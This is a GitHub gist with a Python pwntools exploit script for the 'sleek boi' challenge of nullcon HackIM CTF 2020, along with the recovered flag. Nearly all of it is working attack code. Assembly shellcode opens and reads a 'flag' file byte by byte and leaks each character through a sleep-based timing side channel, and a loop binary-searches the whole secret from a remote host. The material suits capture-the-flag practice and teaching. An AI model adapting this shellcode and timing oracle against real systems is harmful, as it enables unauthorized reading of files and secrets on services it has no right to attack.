Created
February 9, 2020 04:06
-
-
Save KaoRz/bd13d74db0f553bf55fc5185aff781c4 to your computer and use it in GitHub Desktop.
sleek boi script - nullcon HackIM CTF 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import time | |
context.arch = "amd64" | |
HOST = "pwn4.ctf.nullcon.net" | |
PORT = 5003 | |
def screen_clean(): | |
sys.stdout.write("\033[F") | |
sys.stdout.write("\033[K") | |
def send_shellcode(io, offset, limit_intval): | |
shellcode = """ | |
push 0x67616c66 | |
mov rax, 2 | |
mov rdi, rsp | |
xor rsi, rsi | |
xor rdx, rdx | |
syscall | |
push rax | |
mov rdi, rax | |
mov rax, 8 | |
mov rsi, %d | |
mov rdx, 0 | |
syscall | |
pop rdi | |
mov rax, 0 | |
sub rsp, 8 | |
mov rsi, rsp | |
mov rdx, 0x1 | |
syscall | |
mov al, byte ptr [rsp] | |
cmp al, %d | |
jl crash | |
hit: | |
push 0 | |
push 3 | |
mov rdi, rsp | |
xor rsi, rsi | |
mov rax, 35 | |
syscall | |
crash: | |
nop | |
""" % (offset, limit_intval) | |
io.sendline(asm(shellcode)) | |
def bruteforce_char(offset): | |
base_limit = 0 | |
top_limit = 128 | |
for i in range(8): | |
io = remote(HOST, PORT) | |
screen_clean() | |
curr_limit = (int)((top_limit + base_limit) / 2) | |
send_shellcode(io, offset, curr_limit) | |
start = time.time() | |
try: | |
io.recv() | |
except EOFError as error: | |
pass | |
if time.time() - start > 3.0: | |
base_limit = curr_limit | |
else: | |
top_limit = curr_limit | |
log.info("Current character --> " + chr(curr_limit) + " (" + str(base_limit) + ", " + str(top_limit) + ")") | |
io.close() | |
screen_clean() | |
log.success("Char found --> " + chr(curr_limit)) | |
return chr(curr_limit) | |
flag = "" | |
cnt = 0 | |
while "}" not in flag: | |
flag += bruteforce_char(cnt) | |
log.info("Progress --> " + flag) | |
cnt += 1 | |
log.success("FLAG --> " + flag) | |
# [+] FLAG --> hackim20{OMG_The_first_one_was_unintended} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment